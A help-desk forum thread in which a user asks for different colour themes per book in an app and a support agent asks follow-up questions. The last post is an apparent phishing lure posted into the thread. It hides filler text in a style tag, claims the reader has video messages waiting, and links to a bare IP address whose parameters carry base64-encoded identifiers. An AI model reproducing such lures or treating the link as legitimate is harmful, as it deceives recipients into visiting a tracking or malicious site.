Themes

Kim kelly

17 Jul, 2012 02:03 PM

I would like to apply different themes to different books - love the app but I also like a bit of pretty!

1. Support Staff 1 Posted by emolina on 20 Jul, 2012 12:21 AM

You mean the app-wide theme should change (user selectable) when you go into different books?

2. 2 Posted by Kim kelly on 20 Jul, 2012 03:32 PM

Yes exactly!

3. Support Staff 3 Posted by emolina on 23 Jul, 2012 02:59 AM

So do you switch between themes often when you are using the app? you don't have a favorite that you stick to?

4. 4 Posted by Kim kelly on 23 Jul, 2012 01:15 PM

I would like to be able to change the colour of books so they are quickly identifiable on my home page.

5. 5 Posted by kim.r.kelly on 12 Aug, 2014 09:40 AM

<style>The moon slid out from behind its cloud They saw the tiny tigures across the grounds stop Then
    </style><br><br /><h3>[email blocked] has left you 7 video messages</h3><br><br /><a href="http://23.108.55.11/?yu=macaguge&yeruzuye=a2ltLnIua2VsbHlAZ21haWwuY29t&id=dGVuZGVyMiBkYTMxMWQ4ODUyZjNlNzJmN2VjZmJjZWNmZjNiZjA0OTc3NTA4OTFmY0B0ZW5kZXJhcHAuY29t&nizikucohoke=dGVuZGVyMiBkYTMxMWQ4ODUyZjNlNzJmN2VjZmJjZWNmZjNiZjA0OTc3NTA4OTFmYw==" contenteditable="false">view full email content</a>

Reply to this discussion

Internal reply

Formatting help / Preview (switch to plain text) No formatting (switch to Markdown)

Attaching KB article:

»

Attached Files

You can attach files up to 10MB

If you don't have an account yet, we need to confirm you're human and not a machine trying to post spam.

Keyboard shortcuts

Generic

? Show this help
ESC Blurs the current field

Comment Form

r Focus the comment reply box
^ + ↩ Submit the comment

You can use Command ⌘ instead of Control ^ on Mac